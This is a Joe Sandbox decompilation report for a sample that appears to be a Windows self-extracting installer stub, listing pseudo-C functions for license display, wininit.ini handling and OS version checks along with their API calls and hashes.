                                                                                                                                                                                                        				_t1 = E001F468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0x1f8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E001F468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0x1f8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0x1f8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E001F6517(_t19, 0x7d1, 0, E001F3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0x1f8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1f9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0x1f8d4c);
                                                                                                                                                                                                        					 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x001f3a46
                                                                                                                                                                                                        0x001f3a57
                                                                                                                                                                                                        0x001f3a5d
                                                                                                                                                                                                        0x001f3a63
                                                                                                                                                                                                        0x001f3a6a
                                                                                                                                                                                                        0x001f3a91
                                                                                                                                                                                                        0x001f3a9a
                                                                                                                                                                                                        0x001f3ad8
                                                                                                                                                                                                        0x001f3b13
                                                                                                                                                                                                        0x001f3b19
                                                                                                                                                                                                        0x001f3b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3b21
                                                                                                                                                                                                        0x001f3ae7
                                                                                                                                                                                                        0x001f3af4
                                                                                                                                                                                                        0x001f3afc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3afe
                                                                                                                                                                                                        0x001f3a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3a87
                                                                                                                                                                                                        0x001f3aa8
                                                                                                                                                                                                        0x001f3ab3
                                                                                                                                                                                                        0x001f3ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3ab9
                                                                                                                                                                                                        0x001f3a78
                                                                                                                                                                                                        0x001f3a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001F2F64,?,00000002,00000000), ref: 001F3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 001F3AB3
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 001F3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 001F3B13
                                                                                                                                                                                                          • Part of subcall function 001F6517: FindResourceA.KERNEL32(001F0000,000007D6,00000005), ref: 001F652A
                                                                                                                                                                                                          • Part of subcall function 001F6517: LoadResource.KERNEL32(001F0000,00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001F6538
                                                                                                                                                                                                          • Part of subcall function 001F6517: DialogBoxIndirectParamA.USER32(001F0000,00000000,00000547,001F19E0,00000000), ref: 001F6557
                                                                                                                                                                                                          • Part of subcall function 001F6517: FreeResource.KERNEL32(00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001F6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,001F3100,00000000,00000000), ref: 001F3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 293ba30cfe3f700b283a1fb6878a1d768359335bc46f26021002eed42bc8766a
                                                                                                                                                                                                        • Instruction ID: 4c2c8db29e6bf1f79268880314dae6466473df69b38aff1fb97a154a6ad800d0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 293ba30cfe3f700b283a1fb6878a1d768359335bc46f26021002eed42bc8766a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8911E6B0304209ABD724AF76AC19F3B7AB9EFD5750B10413EB745E6AA1DF798840C660
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E001F658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x001f24e0
                                                                                                                                                                                                        0x001f24eb
                                                                                                                                                                                                        0x001f24f2
                                                                                                                                                                                                        0x001f24f7
                                                                                                                                                                                                        0x001f2504
                                                                                                                                                                                                        0x001f250e
                                                                                                                                                                                                        0x001f251d
                                                                                                                                                                                                        0x001f252c
                                                                                                                                                                                                        0x001f2541
                                                                                                                                                                                                        0x001f2546
                                                                                                                                                                                                        0x001f2553
                                                                                                                                                                                                        0x001f2555
                                                                                                                                                                                                        0x001f2555
                                                                                                                                                                                                        0x001f2546
                                                                                                                                                                                                        0x001f256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 001F2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 001F252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 001F253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 001F254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 001F2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: 4aaa0fb6200e43d33d631d4be393c36012f6f4de7799e7546b18fc60c65a70c4
                                                                                                                                                                                                        • Instruction ID: de57f0b945fac07fd96e503844f1663e6b35473f415d65ec4e9228b0e527c3ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aaa0fb6200e43d33d631d4be393c36012f6f4de7799e7546b18fc60c65a70c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301927260011867C7209B65AC09EFB7B7CDF95750F400155FA49D3190DF788E85CA95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E001F36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0x1f8184 = 1;
                                                                                                                                                                                                        						 *0x1f8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0x1f9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0x1f8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E001F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E001F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0x1f8a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0x1f8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E001F681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E001F67C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E001F28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0x1f9a40 = _t119;
                                                                                                                                                                                                        						 *0x1f8184 = 1;
                                                                                                                                                                                                        						 *0x1f8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0x1f9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0x1f8184 = _t135;
                                                                                                                                                                                                        							 *0x1f8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E001F44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E001F6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x001f36f9
                                                                                                                                                                                                        0x001f3700
                                                                                                                                                                                                        0x001f370c
                                                                                                                                                                                                        0x001f3716
                                                                                                                                                                                                        0x001f3718
                                                                                                                                                                                                        0x001f371b
                                                                                                                                                                                                        0x001f3721
                                                                                                                                                                                                        0x001f372b
                                                                                                                                                                                                        0x001f373d
                                                                                                                                                                                                        0x001f3745
                                                                                                                                                                                                        0x001f3746
                                                                                                                                                                                                        0x001f3746
                                                                                                                                                                                                        0x001f3749
                                                                                                                                                                                                        0x001f37ab
                                                                                                                                                                                                        0x001f37ad
                                                                                                                                                                                                        0x001f37ae
                                                                                                                                                                                                        0x001f37b3
                                                                                                                                                                                                        0x001f37b8
                                                                                                                                                                                                        0x001f37b8
                                                                                                                                                                                                        0x001f37bf
                                                                                                                                                                                                        0x001f37bf
                                                                                                                                                                                                        0x001f37c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f37cb
                                                                                                                                                                                                        0x001f37cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f37d5
                                                                                                                                                                                                        0x001f37db
                                                                                                                                                                                                        0x001f37e8
                                                                                                                                                                                                        0x001f37ea
                                                                                                                                                                                                        0x001f37ea
                                                                                                                                                                                                        0x001f37ea
                                                                                                                                                                                                        0x001f37f0
                                                                                                                                                                                                        0x001f37f6
                                                                                                                                                                                                        0x001f3805
                                                                                                                                                                                                        0x001f3817
                                                                                                                                                                                                        0x001f382b
                                                                                                                                                                                                        0x001f3830
                                                                                                                                                                                                        0x001f3836
                                                                                                                                                                                                        0x001f383b
                                                                                                                                                                                                        0x001f383d
                                                                                                                                                                                                        0x001f38eb
                                                                                                                                                                                                        0x001f38eb
                                                                                                                                                                                                        0x001f38f2
                                                                                                                                                                                                        0x001f390c
                                                                                                                                                                                                        0x001f3911
                                                                                                                                                                                                        0x001f3911
                                                                                                                                                                                                        0x001f3913
                                                                                                                                                                                                        0x001f394d
                                                                                                                                                                                                        0x001f394d
                                                                                                                                                                                                        0x001f394f
                                                                                                                                                                                                        0x001f38a9
                                                                                                                                                                                                        0x001f38a9
                                                                                                                                                                                                        0x001f38b0
                                                                                                                                                                                                        0x001f38b2
                                                                                                                                                                                                        0x001f38b9
                                                                                                                                                                                                        0x001f38bb
                                                                                                                                                                                                        0x001f38c1
                                                                                                                                                                                                        0x001f3975
                                                                                                                                                                                                        0x001f38c7
                                                                                                                                                                                                        0x001f38de
                                                                                                                                                                                                        0x001f38e0
                                                                                                                                                                                                        0x001f38e0
                                                                                                                                                                                                        0x001f397b
                                                                                                                                                                                                        0x001f397d
                                                                                                                                                                                                        0x001f39a9
                                                                                                                                                                                                        0x001f397f
                                                                                                                                                                                                        0x001f3982
                                                                                                                                                                                                        0x001f398b
                                                                                                                                                                                                        0x001f398d
                                                                                                                                                                                                        0x001f398f
                                                                                                                                                                                                        0x001f399f
                                                                                                                                                                                                        0x001f39a1
                                                                                                                                                                                                        0x001f3991
                                                                                                                                                                                                        0x001f3991
                                                                                                                                                                                                        0x001f3991
